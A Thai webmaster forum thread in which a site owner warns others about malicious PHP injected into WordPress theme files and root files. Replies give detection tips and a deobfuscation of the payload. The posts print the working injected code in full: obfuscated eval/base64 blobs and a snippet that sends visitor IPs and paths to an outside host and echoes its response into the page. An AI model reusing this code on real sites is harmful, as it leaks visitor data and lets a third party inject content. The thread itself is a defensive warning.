ฝากเตื่อนเพื่อนๆ ก่อนโดน hack

[wasantec]

สืบเนื่องจาก มีคนไม่หวังดีโจมตีมาต่อเนื่องต่างๆนาๆ และพยายามเรื่อย ไม่รู้จะมาประสงค์ร้ายทำไมผมไปทำอะไรให้ ซึงผมก็ตรวจสอบทุกวัน วันละหลายรอบ ซึ่งเป็นความเคยชินไปแล้วมีไฟล์แปลกปลอมเข้ามาก็ลบตลอด และช่วงนี้พิเศษหน่อย มีมาทุกวัน เลยอยากจะเอามาเตือนท่านอื่นด้วย

ของผมจะมี File มี code แปลกปลอมเข้ามาใน index.php footer.php ซึงจะมี code ดังนี้ ไม่รู้ว่ามีการทำงานอย่างไร

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
       if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
       $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
           @$stCurlHandle = curl_init( $stCurlLink );
   }
   }
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
   $sResult = @curl_exec($stCurlHandle);
   if ($sResult[0]=="O")
    {$sResult[0]=" ";
     echo $sResult; // Statistic code end
     }
   curl_close($stCurlHandle);
}
}
?>

หากเพื่อนๆเจอ code แบบนี้ให้ลบออกด่วนเลย
มีอีก ใน root เลย ลบบ่อยมากมันก็พยายามสร้าง ใช้ชื่อเดิม ลบจนเคยชิน

wp-app.php
wp-rdf.php
counter.php

ข้างในเปิดดู บางทีมีชื่อใหม่มาเรื่อยแต่ข้างในเหมือนเดิม

<?php
/**
* Redirects to the RDF feed
* This file is deprecated and only exists for backwards compatibility
*
* @package WordPress
*/

require( './wp-load.php' );
wp_redirect( get_bloginfo( 'rdf_url' ), 301 );
exit;
?>

และ

ข้างใน wp-app.php ทั้งๆที่ผมไม่เคยสร้างมาก่อน ไม่รุ้มาได้ไง

<?php
/**
* Atom Publishing Protocol support for WordPress
*
* @version 1.0.5-dc
*/

/**
* WordPress is handling an Atom Publishing Protocol request.
*
* @var bool
*/
define('APP_REQUEST', true);

/** Set up WordPress environment */
require_once('./wp-load.php');

/** Atom Publishing Protocol Class */
require_once(ABSPATH . WPINC . '/atomlib.php');

/** Atom Server **/
require_once(ABSPATH . WPINC . '/class-wp-atom-server.php');

/** Admin Image API for metadata updating */
require_once(ABSPATH . '/wp-admin/includes/image.php');

$_SERVER['PATH_INFO'] = preg_replace( '/.*\/wp-app\.php/', '', $_SERVER['REQUEST_URI'] );

// Allow for a plugin to insert a different class to handle requests.
$wp_atom_server_class = apply_filters('wp_atom_server_class', 'wp_atom_server');
$wp_atom_server = new $wp_atom_server_class;

// Handle the request
$wp_atom_server->handle_request();

exit;

/**
* Writes logging info to a file.
*
* @since 2.2.0
* @deprecated 3.4.0
* @deprecated Use error_log()
* @link http://www.php.net/manual/en/function.error-log.php
*
* @param string $label Type of logging
* @param string $msg Information describing logging reason.
*/
function log_app( $label, $msg ) {
   _deprecated_function( __FUNCTION__, '3.4', 'error_log()' );
   if ( ! empty( $GLOBALS['app_logging'] ) )
      error_log( $label . ' - ' . $msg );
}

ข้างใน counter.php  ใครแปลได้ก็เอามาแฉหน่อยครับ

<?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>


และอีกหลาย file จำไม่ได้ละเจอ file แปลกลบไว้ก่อน แนะนำให้ท่านๆ หมั่นตรวจสอบดู  file แปลกปลอมด้วยนะครับ ก่อนที่จะมานั่งเสียอารมณ์+เสียใจทีหลัง

[pingenter]

ทำไมมันเยอะจังครับ

[gunhotnews]

ดูวันที่ของไฟล์ ถ้าวันเวลานั้นเราไม่ได้อัพแสดงว่ามีอะไรผิดปกติครับ
ลบด่วนเลย แขาจขกท ปล่อยแบบนั้นไม่ดีเด้อ

[GoogleBot]

ผมโดนประจำ ทางที่ดี โหลดธีมนั้นมา แล้วค้นหาโค๊ดที่มันฝังไม่งั้นไม่หมด

ส่วนใหญ่จะฝัง

index.php
footer.php
page.php

เป็นต้น ลองดูครับ

[yainuwan]

ขอบคุณคร๊า

[SEARCH55]

น่ากลัวแฮะ สงสัยคงต้องลบ theme ฟรีทิ้งให้หมด

[thueksuban]

อ๋าว กลัวเลย แล้วคนที่ความรู้เรื่องโค๊ดงูๆปลาๆอย่างผมจะรอดมั๊ยเนี่ย

[NaiHua]

ขอบคุณครับ ความรู้ใหม่ เดี๋ยวจะเอาไปตรวจสอบดูมั่ง

[be-bb]

ถ้าเจอไฟล์ผิดปกติมา ลบด่วนเลย!!!  ก่อนที่มันจะมาลบเราก่อน
ผมโดนแล้ว มันลบไฟล์เว็บผมสะเกลี้ยงเลยทั้ง2 เว็บ แทบ

[Party]

ข้างใน counter.php  ใครแปลได้ก็เอามาแฉหน่อยครับ

<?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>

และอีกหลาย file จำไม่ได้ละเจอ file แปลกลบไว้ก่อน แนะนำให้ท่านๆ หมั่นตรวจสอบดู  file แปลกปลอมด้วยนะครับ ก่อนที่จะมานั่งเสียอารมณ์+เสียใจทีหลัง

มันเป็น eval gzuncompress base64_decode จากข้างบนมีอยู่สามส่วน ข้างล่างนี้แกะแล้วแต่ก็ยังงงอยู่ใช่ไหม 

โค้ด เลือก ขยาย

$GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('c' .'3Ry' .'c3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c3Ry' .'c3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3R' .'yc3Ry'),base64_decode('YmFzZ' .'TY0X2' .'RlY29kZQ=='),base64_decode('dXJ' .'sZW5' .'jb2R' .'l'),base64_decode('' .'dXJs' .'ZW' .'5j' .'b2' .'Rl'),base64_decode('dXJ' .'sZW5j' .'b2Rl'),base64_decode('dXJsZW' .'5j' .'b2Rl'),base64_decode('Y' .'3Vyb' .'F9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRv' .'cHQ='),base64_decode('' .'Y3Vyb' .'F9zZX' .'RvcH' .'Q='),base64_decode('Y3VybF9' .'le' .'G' .'Vj'),base64_decode('Y' .'3VybF9jbG9z' .'ZQ' .'=='));

โค้ด เลือก ขยาย

function aaf($i){$a=Array('HTTP_USER_AGENT',"",'google','yahoo','baidu','msn','opera','chrome','bing','safari','bot','HTTP_REFERER',"",'REMOTE_ADDR','HTTP_HOST','aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRHL3N0YXQucGhw','?ip=','REMOTE_ADDR','&useragent=','&domainname=','HTTP_HOST','&fullpath=','REQUEST_URI','&check=','look',"O"," ");return $a[$i];}

โค้ด เลือก ขยาย

if(!isset($aafv_0)){global $aafv_0;$aafv_0=round(0+1);$aafv_1=$GLOBALS['_aaf_'][0]($_SERVER[aaf(0)]);$aafv_2=NULL;$aafv_3=aaf(1);if(($GLOBALS['_aaf_'][1]($aafv_1,aaf(2))== false)&&($GLOBALS['_aaf_'][2]($aafv_1,aaf(3))== false)&&($GLOBALS['_aaf_'][3]($aafv_1,aaf(4))== false)&&($GLOBALS['_aaf_'][4]($aafv_1,aaf(5))== false)&&($GLOBALS['_aaf_'][5]($aafv_1,aaf(6))== false)&&($GLOBALS['_aaf_'][6]($aafv_1,aaf(7))== false)&&($GLOBALS['_aaf_'][7]($aafv_1,aaf(8))== false)&&($GLOBALS['_aaf_'][8]($aafv_1,aaf(9))== false)&&($GLOBALS['_aaf_'][9]($aafv_1,aaf(10))== false)&&$_SERVER[aaf(11)]!=aaf(12)){if(isset($_SERVER[aaf(13)])== true && isset($_SERVER[aaf(14)])== true){$aafv_3=$GLOBALS['_aaf_'][10](aaf(15)) .aaf(16) .$GLOBALS['_aaf_'][11]($_SERVER[aaf(17)]) .aaf(18) .$GLOBALS['_aaf_'][12]($aafv_1) .aaf(19) .$GLOBALS['_aaf_'][13]($_SERVER[aaf(20)]) .aaf(21) .$GLOBALS['_aaf_'][14]($_SERVER[aaf(22)]) .aaf(23) .isset($_GET[aaf(24)]);$aafv_2=$GLOBALS['_aaf_'][15]($aafv_3);}}if($aafv_2 !== NULL){$GLOBALS['_aaf_'][16]($aafv_2,CURLOPT_RETURNTRANSFER,round(0+1));$GLOBALS['_aaf_'][17]($aafv_2,CURLOPT_TIMEOUT,round(0+6));$aafv_4=@$GLOBALS['_aaf_'][18]($aafv_2);if($aafv_4[round(0)]==aaf(25)){$aafv_4[round(0)]=aaf(26);echo $aafv_4;}$GLOBALS['_aaf_'][19]($aafv_2);}}


พวกนี้จะมากับธีมที่แจกฟรีครับ ถ้าแกะโค้ดไม่เป็นอย่าเอามาใช้มันไม่คุ้มเสีย แกะโค้ดไม่ยากครับใครชอบธีมฟรีต้องหัดไว้ก็ดีนะ มีเว็บให้ก๊อปโค้ดไปใส่ แต่ต้องมีพื้นฐาน php บ้างนะครับ
http://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php
แต่ถ้ามันกันมาหลายชั้นก็ปวดหัวกับมันหน่อย

[rujirot]

เจอแบบนี้ก็ เงิบเหมือนกัน 

[bananaband]

บางครั้งก็ปวดใจนะเจองี้เข้าไป

[amnuay58]

มือใหม่ เก็บความรู้ครับ

[nocturne in the moonlight]

ผมใช้ ธีมที่มากับ wp แล้ว ใส่ background ,เปลี่ยนสี เอา แต่ละเว็บหน้าก็ไม่ซ้ำกันแล้วอ่ะ อิอิ

[FDN]

ทำอันดับเว็บก็ยากอยู่แล้วพอดันขึ้นไปได้ก็มาhackมาโจมตีกันอีก  

[EntServ]

มันไม่ทำไมมากครับ แค่รีไดเร็ก 301 พวกบอทที่เข้ามาในเว็บไซต์ทั้งหมดไปยังเว็บที่มันต้องการแค่นั้นเอง  

เปิดบริการรับจ้างคลีนของฟรี ท่าจะได้เงินเยอะ  

[twisty]

ขอบคุณมากครับ
ต้องระมัดระวังตัวกันมากขึ้นกว่าเดิม

[scirocco]

ขอบคุณข้อมูลครับ

[jomkamungwej]

เจอแบบนี้ก็ เงิบเหมือนกัน   

[scanwave]

ของฟรี มีแถมตลอด